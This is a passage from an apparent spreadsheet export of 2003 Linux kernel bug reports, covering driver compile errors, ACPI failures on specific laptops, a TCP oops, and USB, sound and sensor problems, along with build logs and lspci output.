drivers/net/defxx.o CC [M] drivers/net/8139cp.o CC [M] drivers/net/8139too.o CC [M] drivers/net/eql.o CC [M] drivers/net/tun.o CC [M] drivers/net/dl2k.o CC [M] drivers/net/arcnet/arcnet.o CC [M] drivers/net/arcnet/rfc1201.o CC [M] drivers/net/arcnet/rfc1051.o CC [M] drivers/net/arcnet/arc-rawmode.o CC [M] drivers/net/arcnet/com90xx.o drivers/net/arcnet/com90xx.c: In function `com90xx_probe': drivers/net/arcnet/com90xx.c:146: warning: `check_region' is deprecated (declared at include/linux/ioport.h:117) CC [M] drivers/net/arcnet/com90io.o CC [M] drivers/net/arcnet/arc-rimi.o CC [M] drivers/net/arcnet/com20020.o CC [M] drivers/net/arcnet/com20020-pci.o CC [M] drivers/net/bonding/bond_main.o CC [M] drivers/net/bonding/bond_3ad.o CC [M] drivers/net/bonding/bond_alb.o LD [M] drivers/net/bonding/bonding.o CC [M] drivers/net/e100/e100_main.o CC [M] drivers/net/e100/e100_config.o CC [M] drivers/net/e100/e100_phy.o CC [M] drivers/net/e100/e100_eeprom.o CC [M] drivers/net/e100/e100_test.o LD [M] drivers/net/e100/e100.o CC [M] drivers/net/e1000/e1000_main.o CC [M] drivers/net/e1000/e1000_hw.o CC [M] drivers/net/e1000/e1000_ethtool.o CC [M] drivers/net/e1000/e1000_param.o LD [M] drivers/net/e1000/e1000.o CC [M] drivers/net/sk98lin/skge.o drivers/net/sk98lin/skge.c: In function `skge_probe': drivers/net/sk98lin/skge.c:607: warning: integer constant is too large for "long" type CC [M] drivers/net/sk98lin/skdim.o CC [M] drivers/net/sk98lin/skaddr.o CC [M] drivers/net/sk98lin/skgehwt.o CC [M] drivers/net/sk98lin/skgeinit.o CC [M] drivers/net/sk98lin/skgepnmi.o CC [M] drivers/net/sk98lin/skgesirq.o CC [M] drivers/net/sk98lin/ski2c.o CC [M] drivers/net/sk98lin/sklm80.o CC [M] drivers/net/sk98lin/skqueue.o CC [M] drivers/net/sk98lin/skrlmt.o CC [M] drivers/net/sk98lin/sktimer.o CC [M] drivers/net/sk98lin/skvpd.o CC [M] drivers/net/sk98lin/skxmac2.o CC [M] drivers/net/sk98lin/skproc.o CC [M] drivers/net/sk98lin/skcsum.o LD [M] drivers/net/sk98lin/sk98lin.o CC [M] drivers/net/skfp/skfddi.o CC [M] drivers/net/skfp/hwmtm.o CC [M] drivers/net/skfp/fplustm.o CC [M] drivers/net/skfp/smt.o CC [M] drivers/net/skfp/cfm.o CC [M] drivers/net/skfp/ecm.o CC [M] drivers/net/skfp/pcmplc.o CC [M] drivers/net/skfp/pmf.o CC [M] drivers/net/skfp/queue.o CC [M] drivers/net/skfp/rmt.o CC [M] drivers/net/skfp/smtdef.o CC [M] drivers/net/skfp/smtinit.o CC [M] drivers/net/skfp/smttimer.o CC [M] drivers/net/skfp/srf.o CC [M] drivers/net/skfp/lnkstat.o CC [M] drivers/net/skfp/smtparse.o CC [M] drivers/net/skfp/hwt.o CC [M] drivers/net/skfp/drvfbi.o CC [M] drivers/net/skfp/ess.o LD [M] drivers/net/skfp/skfp.o CC [M] drivers/net/wan/syncppp.o CC [M] drivers/net/wan/farsync.o drivers/net/wan/farsync.c: In function `fst_open': drivers/net/wan/farsync.c:1316: warning: `MOD_INC_USE_C</t>
  </si>
  <si>
    <t>drivers/net/wan/cosa.c won't compile</t>
  </si>
  <si>
    <t>2003-09-21 17:18 UTC</t>
  </si>
  <si>
    <t>2004-03-29 09:46 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 9.1 Hardware Environment: i686 (celeron) Software Environment: gcc 3.2 Problem Description: here is the output after make modules CC [M] drivers/net/wan/hostess_sv11.o drivers/net/wan/hostess_sv11.c: In function `hostess_open': drivers/net/wan/hostess_sv11.c:125: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) drivers/net/wan/hostess_sv11.c: In function `hostess_close': drivers/net/wan/hostess_sv11.c:157: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] drivers/net/wan/sealevel.o drivers/net/wan/sealevel.c: In function `sealevel_open': drivers/net/wan/sealevel.c:122: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) drivers/net/wan/sealevel.c: In function `sealevel_close': drivers/net/wan/sealevel.c:156: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] drivers/net/wan/cosa.o drivers/net/wan/cosa.c: In function `cosa_ioctl_common': drivers/net/wan/cosa.c:1167: parse error before '[' token drivers/net/wan/cosa.c:1167: case label does not reduce to an integer constant drivers/net/wan/cosa.c:1171: parse error before '[' token drivers/net/wan/cosa.c:1171: case label does not reduce to an integer constant drivers/net/wan/cosa.c:1175: parse error before '[' token drivers/net/wan/cosa.c:1175: case label does not reduce to an integer constant drivers/net/wan/cosa.c:1179: parse error before '[' token drivers/net/wan/cosa.c:1179: case label does not reduce to an integer constant drivers/net/wan/cosa.c:1181: parse error before '[' token drivers/net/wan/cosa.c:1181: case label does not reduce to an integer constant drivers/net/wan/cosa.c:1187: parse error before '[' token drivers/net/wan/cosa.c:1187: case label does not reduce to an integer constant make[3]: *** [drivers/net/wan/cosa.o] Error 1 make[2]: *** [drivers/net/wan] Error 2 make[1]: *** [drivers/net] Error 2 make: *** [drivers] Error 2 [root@x1-6-00-20-e0-6c-19-4d linux-2.6.0-test5]# Steps to reproduce:try to compile with cosa which I think is sorta like NFS. Thats why I put it under networking.</t>
  </si>
  <si>
    <t>2.6.0-test5-mm3</t>
  </si>
  <si>
    <t>multi-byte access in indexfields broken</t>
  </si>
  <si>
    <t>2.6.0-test5 at least</t>
  </si>
  <si>
    <t>2003-09-22 18:37 UTC</t>
  </si>
  <si>
    <t>2006-09-28 13:20 UTC</t>
  </si>
  <si>
    <t>Hello, it appears the problems I mailed about earlier are due to a bug in the ACPI code. Reading from multi-byte fields in a ByteAccess-IndexField seems to be broken. When I replace IndexField (EIND, EDAT, ByteAcc, NoLock, Preserve) { Offset (0x10), IKFG, 8, FRPN, 16, RAMB, 32, AVOL, 8, ... } Method (CRMB, 0, NotSerialized) { Return (RAMB) } with IndexField (EIND, EDAT, ByteAcc, NoLock, Preserve) { Offset (0x10), IKFG, 8, FRPN, 16, RAM0, 8, RAM1, 8, RAM2, 8, RAM3, 8, AVOL, 8, ... } Method (CRMB, 0, NotSerialized) { Store (RAM3, Local0) ShiftLeft (Local0, 0x8, Local0) Add (RAM2, Local0, Local0) ShiftLeft (Local0, 0x8, Local0) Add (RAM1, Local0, Local0) ShiftLeft (Local0, 0x8, Local0) Add (RAM0, Local0, Local0) Return (Local0) } the first version of CRMB computes 0x64646464, while the second version computes the correct 0x0F750064. The least byte seems to just be copied to the other positions. Cheers Robert</t>
  </si>
  <si>
    <t>ehci_hcd in sysfs</t>
  </si>
  <si>
    <t>2.6-test5</t>
  </si>
  <si>
    <t>2003-09-22 20:50 UTC</t>
  </si>
  <si>
    <t>2004-07-17 17:33 UTC</t>
  </si>
  <si>
    <t>ohci-hcd and uhci-hcd are dash ehci_hcd is underscore [root@smirl drivers]# pwd /sys/bus/pci/drivers [root@smirl drivers]# ls agpgart-intel e1000 Intel ICH ohci1394 parport_pc PIIX IDE serial bttv ehci_hcd Intel ICH Joystick ohci-hcd PCI IDE RZ1000 IDE uhci-hcd [root@smirl drivers]# [root@smirl drivers]#</t>
  </si>
  <si>
    <t>ACPI is not functional on IBM ThinkPad G40</t>
  </si>
  <si>
    <t>2003-09-24 00:25 UTC</t>
  </si>
  <si>
    <t>Martin Perina</t>
  </si>
  <si>
    <t>2004-03-03 22:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux Sid Hardware Environment: IBM ThinkPad G40, BIOS 1.04 Software Environment: glibc 2.3.2-8 gcc 3.3.2-0pre4 kernel 2.4.22-1 ACPI 20030916 patch Problem Description: I'm unable to run ACPI on IBM ThinkPad G40 on 2.4.22 or 2.4.22 + ACPI20030916 patch. ACPI says it cannot use ECDT table, but this table is correct. Here's dmesg output: Linux version 2.4.22 (root@perina) (gcc version 3.3.2 20030908 (Debian prerelease)) #2 Po z</t>
  </si>
  <si>
    <t>Kernel freeze when setting IP address in via-rhine network driver with ifconfig</t>
  </si>
  <si>
    <t>2003-09-24 16:55 UTC</t>
  </si>
  <si>
    <t>Nicolas Dufour</t>
  </si>
  <si>
    <t>2003-12-17 18:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4 Hardware Environment: Laptop Duron 1.4GHz with network card VT6102 [Rhine-II] (rev 51) Software Environment: ifconfig 1.42 (2001-04-13) Problem Description: The kernel freezes right after setting IP address in the network interface managed by the via-rhine module. I try other versions of the 2.6 tree and the same behavior happened. Steps to reproduce: 1. modprobe via-rhine 2. ifconfig eth0 192.168.1.1 3. -- kernel frozen --</t>
  </si>
  <si>
    <t>Saw underflow</t>
  </si>
  <si>
    <t>2003-09-25 00:18 UTC</t>
  </si>
  <si>
    <t>Uwe Schmeling</t>
  </si>
  <si>
    <t>2003-12-01 11:28 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.2 Hardware Environment: Adaptec 2940 Ultra2 SCSI adapter Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: SEAGATE Model: ST318438LW Rev: 0003 Type: Direct-Access ANSI SCSI revision: 03 Software Environment: Adaptec AIC7xxx driver version: 6.2.35 aic7890/91: Ultra2 Wide Channel A, SCSI Id=7, 32/253 SCBs Allocated SCBs: 68, SG List Length: 128 Problem Description: (scsi0:A:0:0): CDB: 0x12 0x1 0x80 0x0 0xff 0x0 (scsi0:A:0:0): Saw underflow (744 of 768 bytes). Treated as error Steps to reproduce:</t>
  </si>
  <si>
    <t>boot hang unless "nolapic" -- ASUS M2400N</t>
  </si>
  <si>
    <t>2.6.0-test5, 2.4.22</t>
  </si>
  <si>
    <t>2003-09-25 02:17 UTC</t>
  </si>
  <si>
    <t>Robert Vollmert</t>
  </si>
  <si>
    <t>2004-11-04 00:49 UTC</t>
  </si>
  <si>
    <t>1026 1677 1682 1774 2044 2694 3002 3451</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: ASUS M2400N Centrino notebook Software Environment: Problem Description: Hangs on boot when executing all _STA and _INI methods. More exactly, with 'Local APIC' enabled, the computer hangs when executing \_SB.PCI0.VGA._INI during boot-up, and also later when VGA-related methods are called (after removing _INI from a custom DSDT to boot the system). There's none of these problems when 'Local APIC' is disabled. Linux 2.4.22 and 2.6.0-test5 appear to behave the same here (both with ACPI 20030916). The actual offending code in the DSDT appears to be a write to IO address 0xB2 by a method \ISMI (Issue SMI?). These calls are used to query and set the active display devices (flat panel and/or external monitor). The XFree86 driver for the integrated chipset, i855GM (the driver is i810) has some code for switching display devices via 'int 10h', i.e. the video BIOS. I have extracted this and made a small test program with LRMI (http://sourceforge.net/projects/lrmi) and this can successfully set and read the attached display state. This works both with or without 'Local APIC' support (as does the X server). So perhaps the BIOS makes the same calls to the video BIOS when told to by the DSDT? Steps to reproduce: Apply ACPI 20030916 patch (though I doubt this is necessary, I haven't tested without), patch ACPI to circumvent bug #1260, and reboot.</t>
  </si>
  <si>
    <t>bio too big device hdc1 (144 &gt; 128)</t>
  </si>
  <si>
    <t>2.6.0-test5-bk10 to 2.6.0-test5-bk12</t>
  </si>
  <si>
    <t>2003-09-25 13:29 UTC</t>
  </si>
  <si>
    <t>2003-09-29 11:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Redhat Rawhide Hardware Environment: two identical Maxtor 6Y080L0 drives on a SiI680 in software raid 1 Problem Description: Since 2.6.0-test5-bk10 included log messages are flooded with : bio too big device hdc1 (144 &gt; 128) raid1: hdc1: rescheduling sector 6326816 raid1: hdc1: redirecting sector 6326816 to another mirror bio too big device hdc1 (144 &gt; 128) hdc1 is the first raid drive and is no longer updated (for example grub only sees new kernels if it boots from the second drive). This is a 100% software problem - switching back to 2.6.0-test5-bk9 stops all warnings Steps to reproduce: Just boot from a post 2.6.0-test5-bk9 kernel</t>
  </si>
  <si>
    <t>Kernel panic in network code</t>
  </si>
  <si>
    <t>2003-09-25 17:09 UTC</t>
  </si>
  <si>
    <t>Jason Hall</t>
  </si>
  <si>
    <t>2003-10-28 13:02 UTC</t>
  </si>
  <si>
    <t>Problem Description: Unable to handle kernel NULL pointer dereference at virtual address 00000049 printing eip: c030b346 *pde = 00000000 Oops: 0000 [#1] CPU: 1 EIP: 0060:[&lt;c030b346&gt;] Not tainted EFLAGS: 00010246 EIP is at tcp_v4_get_port+0x3c6/0x3e0 eax: 00000000 ebx: f74ff380 ecx: f667ff40 edx: f667ff50 esi: 00000002 edi: 00002151 ebp: f66097c0 esp: f6b0be68 ds: 007b es: 007b ss: 0068 Process perl (pid: 3433, threadinfo=f6b0a000 task=f6b0d900) Stack: 00000000 00000000 00000000 f66270d0 00000000 00000000 00000001 f6609908 00000000 00000000 00000000 00000001 f7c90a88 f66097c0 ffffffea f6609908 f6b0bee8 c031f215 f66097c0 00002151 c02d568d 00000003 21511818 f6612740 Call Trace: [&lt;c031f215&gt;] inet_bind+0x1d5/0x300 [&lt;c02d568d&gt;] move_addr_to_kernel+0x8d/0xa0 [&lt;c02d6d8b&gt;] sys_bind+0x7b/0xb0 [&lt;c011c11c&gt;] do_page_fault+0x23c/0x44f [&lt;c02d59dc&gt;] sockfd_lookup+0x1c/0x80 [&lt;c02d74d8&gt;] sys_setsockopt+0x78/0xc0 [&lt;c02d7be8&gt;] sys_socketcall+0xc8/0x2b0 [&lt;c01095d9&gt;] sysenter_past_esp+0x52/0x71 Code: 0f b6 40 49 24 20 84 c0 75 97 eb 89 89 14 24 e8 06 51 e1 ff &lt;0&gt;Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing Steps to reproduce: rpmbuild --rebuild --target=athlon mod_perl-1.99_07-5.src.rpm The kernel panics during the make test stage. I believe the modules/cgi test is the culprit. Software Environment: Linux 2.6.0-test5 #3 SMP Tue Sep 23 15:18:28 GMT+5 2003 i686 athlon i386 GNU/Linux Gnu C 3.2.2 Gnu make 3.79.1 util-linux 2.11y mount 2.11y module-init-tools 2.4.25 e2fsprogs 1.32 jfsutils 1.0.17 reiserfsprogs 3.6.4 pcmcia-cs 3.1.31 quota-tools 3.06. PPP 2.4.1 isdn4k-utils 3.1pre4 nfs-utils 1.0.5 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 2.0.11 Net-tools 1.60 Kbd 1.08 Sh-utils 4.5.3 Modules Loaded natsemi crc32</t>
  </si>
  <si>
    <t>2.6.0-test6</t>
  </si>
  <si>
    <t>snd_via82xx and "Disabling IRQ" "nobody care"</t>
  </si>
  <si>
    <t>2003-09-28 04:51 UTC</t>
  </si>
  <si>
    <t>Frederic Bages</t>
  </si>
  <si>
    <t>2003-12-04 06:35 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux, kernel from kernel.org Hardware Environment: PC Software Environment: Problem Description: Code line 303 in irq.c disables valid irq used by the snd_via_82xx. The result is that i'm unable to play sound with my computer. The sound works again if i comment the following 3 lines and rebuils the kernel : // printk(KERN_EMERG "Disabling IRQ #%d\n", irq); // desc-&gt;status |= IRQ_DISABLED; // desc-&gt;handler-&gt;disable(irq); Steps to reproduce: Install kernel 2.6.0-test4 or kernel-2.6.0-test6 and boot.</t>
  </si>
  <si>
    <t>Undefined reference to sched_clock</t>
  </si>
  <si>
    <t>2003-09-28 17:21 UTC</t>
  </si>
  <si>
    <t>2003-10-03 13:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian 3.0 Hardware Environment: Alpha EV56 (EB164/PC164) 500Mhz Software Environment: gcc 3.2.3 Problem Description: I am getting an undefined reference to sched_clock when doing "make vmlinux". I ran into this problem with 2.6.0-test5 which I did not report because it was said that a developer on the linux-kernel said a patch for this would be out. I did not notice the patch on the list so I am posting the problem here. Here is the bug report: storri@alpha:$ sudo make vmlinux make[1]: `arch/alpha/kernel/asm-offsets.s' is up to date. CHK include/linux/compile.h GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 kernel/built-in.o: In function `try_to_wake_up': kernel/built-in.o(.text+0x4e0): undefined reference to `sched_clock' kernel/built-in.o(.text+0x4e4): undefined reference to `sched_clock' kernel/built-in.o: In function `schedule': kernel/built-in.o(.text+0x14f0): undefined reference to `sched_clock' kernel/built-in.o(.text+0x14f4): undefined reference to `sched_clock' kernel/built-in.o: In function `copy_process': kernel/built-in.o(.text+0x551c): undefined reference to `sched_clock' kernel/built-in.o(.text+0x5520): more undefined references to `sched_clock' follow make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: 1.) Build linux kernel with the config attached. 2.) Build and install modules via make modules_install 3.) Attempt to build vmlinux via make vmlinux</t>
  </si>
  <si>
    <t>Hard Lockup</t>
  </si>
  <si>
    <t>2.6.0-test[4,5,6]</t>
  </si>
  <si>
    <t>2003-09-28 19:14 UTC</t>
  </si>
  <si>
    <t>2004-12-01 09:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Hardware Environment: Sharp PC-GP1415 - Athlon XP 1200, Via Chipset, 256Mb RAM, S3 Twister. Software Environment: Linux alfroid 2.6.0-test6 #1 Mon Sep 29 01:23:36 BST 2003 i686 GNU/Linux Gnu C 3.3.2 Gnu make 3.80 util-linux 2.11z mount 2.11z e2fsprogs 1.35-WIP PPP 2.4.1 nfs-utils 1.0.5 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.12 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.0 Modules Loaded rtc reiserfs via82cxxx_audio uart401 sound ac97_codec via_rhine mii Problem Description: The machine locks up such that the pointer doesn't move and the keyboard doesn't work. I have tried the SysRq keys but these don't work either. I have the NMI Watchdog enabled and have confirmed from /proc/interrupts that NMIs occur, but no NMI watchdog messages appear on the system console. The fan does start suggesting the CPU is busy. Steps to reproduce: I first had the problem starting GNOME - the lockup happened before the startup splash disappeared. Now I have also had it when logging into text mode console and running menuconfig (text console is using framebuffer mode). This doesn't happen with kernel 2.6.0-test3 - it started with 2.6.0-test4 and has remained an issue with test5 and test6.</t>
  </si>
  <si>
    <t>USB failure starting in 2.4.23-pre5 on SIS 648 IOAPIC</t>
  </si>
  <si>
    <t>2.4.23-pre5</t>
  </si>
  <si>
    <t>2003-09-28 20:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: HP psc2110xi and a Logitech Cordless Optical Mouse (Logitech Click! Plus Software Environment: Problem Description: I(David van Hoose [david.vanhoose@comcast.net]) compiled and booted 2.4.23-pre5 the other morning, and my USB didn't work. My USB does work under 2.4.23-pre4.</t>
  </si>
  <si>
    <t>radeonfb do not correctly detect LCD</t>
  </si>
  <si>
    <t>2003-09-29 03:38 UTC</t>
  </si>
  <si>
    <t>petr olivka</t>
  </si>
  <si>
    <t>2005-08-15 17:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Dell D600 Software Environment: Problem Description: On boot time redeonfb driver do not correctly detect LCD, and result is unreadable screen. Radeonfb in 2.4.22 work fine. Steps to reproduce:Everytime, when radeonfb is compiled in kernel.</t>
  </si>
  <si>
    <t>System stall on probing uhci-hcd</t>
  </si>
  <si>
    <t>2003-09-29 05:06 UTC</t>
  </si>
  <si>
    <t>Alexander K</t>
  </si>
  <si>
    <t>2004-07-17 17:32 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Sony Vaio C1 Picturebook Software Environment: console Problem Description: Complete system stall on probing uhci-hcd The laptop is a Transmeta based X86 machine. On probing 'uhci-hcd' I get the following three lines of output (had to manually copy this so it may contain typos): PCI: Found IRQ 9 for device 0000:00:07.2 PCI: Sharing IRQ 9 with 0000:00:08.0 uhci-hcd 0000:00:07.2: UHCI Host Controller And then the machine is dead (test5-mm4 showed the same behaviour). Pressing Alt+SYSRQ keys does nothing. Using "acpi=off" has no effect - probing with/without devices attached to USB has no effect either. The hardware worked flawlessly with 2.4's 'uhci' module (with ACPI enabled). I'll attach lspci, config and interrupts. Steps to reproduce: modprobe uhci-hcd</t>
  </si>
  <si>
    <t>Intermezzo fs won't compile</t>
  </si>
  <si>
    <t>2003-09-29 07:25 UTC</t>
  </si>
  <si>
    <t>Arc C.</t>
  </si>
  <si>
    <t>2004-07-09 18:57 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat Linux 7.3 Hardware Environment: DEC Alpha (Miata) PWS500a Software Environment: gcc 3.3.1, binutils 2.14.90 20030915 Problem Description: While compiling kernel module for Intermezzo fs, get the error CC [M] fs/intermezzo/dir.o fs/intermezzo/dir.c: In function `izo_dentry_is_ilookup': fs/intermezzo/dir.c:109: warning: long unsigned int format, different type arg (arg 7) fs/intermezzo/dir.c:109: warning: long unsigned int format, different type arg (arg 8) fs/intermezzo/dir.c: In function `presto_iget_ilookup': fs/intermezzo/dir.c:151: warning: long unsigned int format, different type arg (arg 6) fs/intermezzo/dir.c:155: warning: long unsigned int format, different type arg (arg 6) fs/intermezzo/dir.c: In function `presto_ioctl': fs/intermezzo/dir.c:1309: error: invalid application of `sizeof' to an incomplete type make[2]: *** [fs/intermezzo/dir.o] Error 1 make[1]: *** [fs/intermezzo] Error 2 make: *** [fs] Error 2 Steps to reproduce: Download kernel 2.6.0-test6, configure and do make. Not sure if reproductible on iX86 platforms.</t>
  </si>
  <si>
    <t>Trident 4D audio not working</t>
  </si>
  <si>
    <t>2.6.0-test8</t>
  </si>
  <si>
    <t>2003-09-29 19:04 UTC</t>
  </si>
  <si>
    <t>Con Kolivas</t>
  </si>
  <si>
    <t>2003-10-29 19:34 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 9.1 Hardware Environment: SiS 630 chipset on board audio; relevant lspci -vvv output: 00:01.4 Multimedia audio controller: Silicon Integrated Systems [SiS] SiS PCI Audio Accelerator (rev 02) Subsystem: CLEVO/KAPOK Computer: Unknown device 2202 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 128 (500ns min, 6000ns max) Interrupt: pin B routed to IRQ 5 Region 0: I/O ports at 3400 [size=256] Region 1: Memory at 44003000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=55mA PME(D0-,D1-,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Problem Description: Since about test5 I think (worked in test4) the modules load but no output is put into the syslog, and /dev/dsp and /dev/adsp respond with "/dev/dsp: No such device" Modules loaded: snd_trident 41124 0 snd_ac97_codec 52836 1 snd_trident snd_pcm 88800 1 snd_trident snd_timer 22368 1 snd_pcm gameport 3872 1 snd_trident snd_page_alloc 9412 2 snd_trident,snd_pcm snd_util_mem 3456 1 snd_trident snd_mpu401_uart 6304 1 snd_trident snd_rawmidi 20352 1 snd_mpu401_uart snd 44644 7 snd_trident,snd_ac97_codec,snd_pcm,snd_timer,snd_util_mem,snd_mpu401_uart,snd_rawmidi soundcore 7168 1 snd</t>
  </si>
  <si>
    <t>HT should not require CONFIG_ACPI</t>
  </si>
  <si>
    <t>2003-09-29 22:43 UTC</t>
  </si>
  <si>
    <t>2004-03-04 12:00 UTC</t>
  </si>
  <si>
    <t>From Marcelo: Ive received a few complaints that HT, starting from 2.4.22, needs ACPI enabled. Users who had HT working now have to use ACPI and they didnt before. We should have HT working AUTOMATICALLY without ACPI enabled and WITHOUT any special boot option, as before.</t>
  </si>
  <si>
    <t>[PATCH] buffer overflow in resource list handling</t>
  </si>
  <si>
    <t>all</t>
  </si>
  <si>
    <t>2003-09-30 10:27 UTC</t>
  </si>
  <si>
    <t>Nate Lawson</t>
  </si>
  <si>
    <t>2006-09-28 13:17 UTC</t>
  </si>
  <si>
    <t>Distribution: All (ACPICA) Problem Description: Patch and problem description are below. http://sourceforge.net/mailarchive/forum.php?thread_id=3156518&amp;forum_id=6102</t>
  </si>
  <si>
    <t>[PATCH] Correct Stall semantics</t>
  </si>
  <si>
    <t>?</t>
  </si>
  <si>
    <t>2003-09-30 12:36 UTC</t>
  </si>
  <si>
    <t>Robert Moore</t>
  </si>
  <si>
    <t>Software Environment: ACPI-CA Problem Description: The Stall() opcode in AML is specifically restricted to 100 microseconds max in the spec. Some AML vendors get Stall() and Sleep() mixed up and thus end up with overly long Stalls. For example, Stall(0x3e8) is probably an attempt to sleep for a second. The below patch does not attempt to fix this but does use the appropriate sleep call in place of overly long stalls. It also removes some redundant code. http://www.root.org/~nate/acpi/exsystem.diff</t>
  </si>
  <si>
    <t>i2c-nforce2 &amp; w83781d modules appear not to provide h/w monitoring</t>
  </si>
  <si>
    <t>2003-09-30 18:35 UTC</t>
  </si>
  <si>
    <t>Mickey Stein</t>
  </si>
  <si>
    <t>2005-08-08 12:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Redhat 9 Hardware Environment: Abit nforce2 NF7 series Mobo, AthlonXP, w83627hf h/w monitoring chip. Software Environment: Mostly RH9 with many major upgrades from the rawhide tree. And 2.6.0-test6 of course. Problem Description: The problem is that after building the kernel to include the various chip monitoring i2c modules, that although they can be seen in the /sys tree, that there's no 'values' for the "temperatures" or "fans" etc, or nothing that resembles what would've been had this been in the /proc tree on a 2.4.x kernel. I did thefollowing commands: modprobe i2c-nforce2 ; modprobe w83781d "lsmod | grep i2c" - gives: i2c_sensor 2944 1 w83781d i2c_nforce2 6272 0 i2c_core 25668 3 w83781d,i2c_sensor,i2c_nforce2 "lspci -v" - gives: 00:00.0 Host bridge: nVidia Corporation: Unknown device 01e0 (rev a2) Subsystem: ABIT Computer Corp.: Unknown device 1c01 Flags: bus master, 66Mhz, fast devsel, latency 0 Memory at d0000000 (32-bit, prefetchable) [size=128M] Capabilities: [40] AGP version 3.0 Capabilities: [60] #08 [2001] 00:00.1 RAM memory: nVidia Corporation: Unknown device 01eb (rev a2) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66Mhz, fast devsel 00:00.2 RAM memory: nVidia Corporation: Unknown device 01ee (rev a2) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66Mhz, fast devsel 00:00.3 RAM memory: nVidia Corporation: Unknown device 01ed (rev a2) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66Mhz, fast devsel 00:00.4 RAM memory: nVidia Corporation: Unknown device 01ec (rev a2) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66Mhz, fast devsel 00:00.5 RAM memory: nVidia Corporation: Unknown device 01ef (rev a2) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66Mhz, fast devsel 00:01.0 ISA bridge: nVidia Corporation nForce2 ISA Bridge (rev a3) Subsystem: ABIT Computer Corp.: Unknown device 1c01 Flags: bus master, 66Mhz, fast devsel, latency 0 Capabilities: [48] #08 [01e1] 00:01.1 SMBus: nVidia Corporation nForce2 SMBus (MCP) (rev a2) Subsystem: ABIT Computer Corp.: Unknown device 1c01 Flags: 66Mhz, fast devsel, IRQ 10 I/O ports at e000 [size=32] Capabilities: [44] Power Management version 2 00:02.0 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) (prog -if 10 [OHCI]) Subsystem: ABIT Computer Corp.: Unknown device 1c01 Flags: bus master, 66Mhz, fast devsel, latency 0, IRQ 11 Memory at df002000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 00:02.1 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) (prog 00:02.1 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) (prog -if 10 [OHCI]) Subsystem: ABIT Computer Corp.: Unknown device 1c01 Flags: bus master, 66Mhz, fast devsel, latency 0, IRQ 3 Memory at df003000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 00:02.2 USB Controller: nVidia Corporation nForce2 USB Controller (rev a3) (prog -if 20 [EHCI]) Subsystem: ABIT Computer Corp.: Unknown device 1c01 Flags: bus master, 66Mhz, fast devsel, latency 0, IRQ 7 Memory at df004000 (32-bit, non-prefetchable) [size=256] Capabilities: [44] #0a [2080] Capabilities: [80] Power Management version 2 00:04.0 Ethernet controller: nVidia Corporation nForce2 Ethernet Controller (rev a1) Subsystem: ABIT Computer Corp.: Unknown device 1c01 Flags: bus master, 66Mhz, fast devsel, latency 0, IRQ 11 Memory at df000000 (32-bit, non-prefetchable) [size=4K] I/O ports at e400 [size=8] Capabilities: [44] Power Management version 2 00:08.0 PCI bridge: nVidia Corporation: Unknown device 006c (rev a3) (prog-if 00 00:08.0 PCI bridge: nVidia Corporation: Unknown device 006c (rev a3) (prog-if 00 [Normal decode]) Flags: bus master, 66Mhz, fast devsel, latency 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 Memory behind bridge: de000000-deffffff 00:09.0 IDE interface: nVidia Corporation nForce2 IDE (rev a2) (prog-if 8a [Mast er SecP PriP]) Subsystem: ABIT Computer Corp.: Unknown device 1c01 Flags: bus master, 66Mhz, fast devsel, latency 0 I/O ports at f000 [size=16] Capabilities: [44] Power Management version 2 00:1e.0 PCI bridge: nVidia Corporation nForce2 AGP (rev a2) (prog-if 00 [Normal decode]) Flags: bus master, 66Mhz, medium devsel, latency 32 Bus: primary=00, secondary=02, subordinate=02, sec-latency=32 Memory behind bridge: dc000000-ddffffff Prefetchable memory behind bridge: d8000000-dbffffff 01:09.0 Multimedia audio controller: Cirrus Logic CS 4614/22/24 [CrystalClear So undFusion Audio Accelerator] (rev 01) 